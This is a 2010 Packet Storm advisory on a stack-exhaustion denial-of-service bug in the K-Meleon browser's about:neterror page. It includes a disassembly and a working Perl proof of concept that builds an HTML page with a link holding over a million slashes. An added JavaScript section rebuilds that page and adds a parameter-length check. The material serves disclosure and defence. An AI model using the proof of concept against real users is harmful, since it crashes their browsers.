K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow

2010-08-06T00:00:00
ID PACKETSTORM:92470
Type packetstorm
Reporter Lostmon
Modified 2010-08-06T00:00:00

Description

############################################  
K-Meleon for Windows about:neterror Stack Overflow DoS  
Vendor URL: http://kmeleon.sourceforge.net/  
Advisory: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html  
Vendor notified: Yes    Exploit available: Yes  
############################################  
  
K-Meleon is an extremely fast, customizable, lightweight web browser  
based on the Gecko layout engine developed by Mozilla which is also  
used by Firefox. K-Meleon is free, open source software released under  
the GNU General Public License and is designed specifically for  
Microsoft Windows (Win32) operating systems.  
  
K-Meleon is prone to crashing on a very long URL. The internal page  
about:neterror does not limit the number of characters a user can place  
in its 'c' and 'd' parameters, so a URL composed with an oversized  
parameter crashes the browser easily. The issue is exploitable via web  
links such as <a href="very long url">click here</a>, via  
window.location.replace('very long url'), or via similar vectors.  
  
#################  
Versions Tested  
#################  
  
I have tested this issue on Win XP SP3 and on a fully patched Windows 7.  
  
Win XP SP3:  
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)  
K-Meleon 1.6.0a4: vulnerable (crashes)  
  
Windows 7 Ultimate:  
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)  
K-Meleon 1.6.0a4: vulnerable (crashes)  
  
############  
References  
############  
  
Discovered: 29-07-2010  
Vendor notified: 31-07-2010  
Vendor Response:  
Vendor patch:  
  
########################  
ASM code stack overflow  
########################  
  
ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png  
  
The routine below is the MSVC stack-probe helper (_chkstk): EAX carries the  
frame size being requested, and the loop touches the stack one 0x1000-byte  
page at a time. The TEST that faults is the probe stepping onto a guard page  
past the end of the thread's stack, so the "stack overflow" here is stack  
exhaustion, which terminates the process rather than overwriting data.  
  
CPU Disasm  
Address   Hex dump          Command  
0043CB3F  CC                INT3  
0043CB40  /$ 3D 00100000    CMP EAX,1000  
0043CB45  |. 73 0E          JNB SHORT 0043CB55  
0043CB47  |. F7D8           NEG EAX  
0043CB49  |. 03C4           ADD EAX,ESP  
0043CB4B  |. 83C0 04        ADD EAX,4  
0043CB4E  |. 8500           TEST DWORD PTR DS:[EAX],EAX  
0043CB50  |. 94             XCHG EAX,ESP  
0043CB51  |. 8B00           MOV EAX,DWORD PTR DS:[EAX]  
0043CB53  |. 50             PUSH EAX  
0043CB54  |. C3             RETN  
0043CB55  |> 51             PUSH ECX  
0043CB56  |. 8D4C24 08      LEA ECX,[ARG.1]  
0043CB5A  |> 81E9 00100000  /SUB ECX,1000  
0043CB60  |. 2D 00100000    |SUB EAX,1000  
0043CB65  |. 8501           |TEST DWORD PTR DS:[ECX],EAX   <== Stack overflow  
0043CB67  |. 3D 00100000    |CMP EAX,1000  
0043CB6C  |.^ 73 EC         \JNB SHORT 0043CB5A  
0043CB6E  |. 2BC8           SUB ECX,EAX  
0043CB70  |. 8BC4           MOV EAX,ESP  
0043CB72  |. 8501           TEST DWORD PTR DS:[ECX],EAX  
0043CB74  |. 8BE1           MOV ESP,ECX  
0043CB76  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]  
0043CB78  |. 8B40 04        MOV EAX,DWORD PTR DS:[EAX+4]  
0043CB7B  |. 50             PUSH EAX  
0043CB7C  \. C3             RETN  
0043CB7D  CC                INT3  
0043CB7E  CC                INT3  
  
  
  
  
################  
Proof Of Concept  
################  
  
#!/usr/bin/perl  
#######################################################################  
# K-Meleon Long "a href" Link DoS  
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com  
# K-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS  
# Generate the file, open it with K-Meleon, click the link and wait a few seconds  
######################################################################  
  
use strict;  
use warnings;  
  
my $archivo = $ARGV[0];  
if (!defined($archivo)) {  
    print "Usage: $0 <archivo.html>\n";  
    exit 1;    # the original fell through and tried to write to an undefined file name  
}  
  
my $cabecera = "<html>\n";  
# about:neterror link with an unbounded 'c' parameter: 1028135 forward slashes  
my $payload  = "<a href=\"about:neterror?e=connectionFailure&c=" . ("/" x 1028135)  
             . "\">click here if you can :)</a>\n";  
my $fin      = "</html>";  
  
my $datos = $cabecera . $payload . $fin;  
  
# '>' opens for writing; the original used '<' (read-only), so nothing was ever written  
open(my $fh, '>', $archivo) or die "Cannot open $archivo for writing: $!\n";  
print $fh $datos;  
close($fh);  
  
exit;  
  
################## EOF ######################  
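The following is an added example, not part of the original advisory and not K-Meleon or Gecko code. It rebuilds the link the Perl PoC writes (the same e=connectionFailure query with 1028135 slashes in 'c'), wraps it in both delivery vectors the description names (a plain href and window.location.replace), and adds the bound the description says about:neterror lacks: a per-parameter length cap on 'c' and 'd' (in Gecko's neterror page 'c' carries the charset and 'd' the error description). The 4096-character cap is an assumption chosen for illustration, not a Gecko value, and the ordinary-looking about:neterror URL used for comparison is constructed.

```javascript
// Added example (not from the advisory or from K-Meleon/Gecko): rebuild the PoC
// link and show the missing per-parameter bound on about:neterror.
// MAX_PARAM_LEN is an assumed cap chosen for illustration, not a Gecko value.
const MAX_PARAM_LEN = 4096;
const CHECKED_PARAMS = ["c", "d"]; // the two parameters the advisory names

// Same URL the Perl PoC writes: e=connectionFailure and `slashes` forward
// slashes in the 'c' parameter (1028135 in the advisory).
function buildNeterrorUrl(slashes) {
  return "about:neterror?e=connectionFailure&c=" + "/".repeat(slashes);
}

// Wrap a URL in the two delivery vectors the description names.
function buildPoCPage(url) {
  const hrefVector = `<a href="${url}">click here if you can :)</a>`;
  const jsVector = `<script>window.location.replace(${JSON.stringify(url)});</script>`;
  return `<html>\n${hrefVector}\n${jsVector}\n</html>`;
}

// The bound the advisory says is missing: walk the raw query string and flag
// any checked parameter whose (still percent-encoded) value exceeds maxLen.
// Measuring before decoding means an oversized value is rejected before the
// browser has to hold or render it.
function checkNeterrorParams(url, maxLen = MAX_PARAM_LEN) {
  const qIdx = url.indexOf("?");
  if (!url.startsWith("about:neterror") || qIdx < 0) {
    return { ok: false, reason: "not an about:neterror URL with a query", tooLong: [] };
  }
  const tooLong = [];
  for (const pair of url.slice(qIdx + 1).split("&")) {
    const eq = pair.indexOf("=");
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? "" : pair.slice(eq + 1);
    if (CHECKED_PARAMS.includes(name) && value.length > maxLen) {
      tooLong.push({ name, length: value.length });
    }
  }
  return tooLong.length === 0
    ? { ok: true, reason: "", tooLong }
    : { ok: false, reason: "parameter exceeds " + maxLen + " characters", tooLong };
}

// Usage: the PoC URL is rejected; a constructed ordinary error-page URL passes.
const pocUrl = buildNeterrorUrl(1028135);
console.log(checkNeterrorParams(pocUrl));
console.log(checkNeterrorParams(
  "about:neterror?e=connectionFailure&u=http://example.invalid/&c=UTF-8&d=Could%20not%20connect"));
console.log(buildPoCPage(pocUrl).length, "bytes of HTML for the PoC page");
```

Run it with node; checkNeterrorParams returns ok:false with the offending parameter and its length for the PoC URL, and ok:true for a normally sized error page. The check deliberately measures the encoded value rather than the decoded one, so the cap holds regardless of how the value is later decoded or displayed.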
  
##############  
Related Links  
##############  
  
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251  
Possibly related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474  
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776  
  
###################### €nd #############################  
  
Thanks to Phreak for support and for helping me understand the nature of this bug,  
and thanks to jajoni for testing it on the Windows 7 x64 version.  
  
Sincerely:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
Curiosity is what moves the mind....  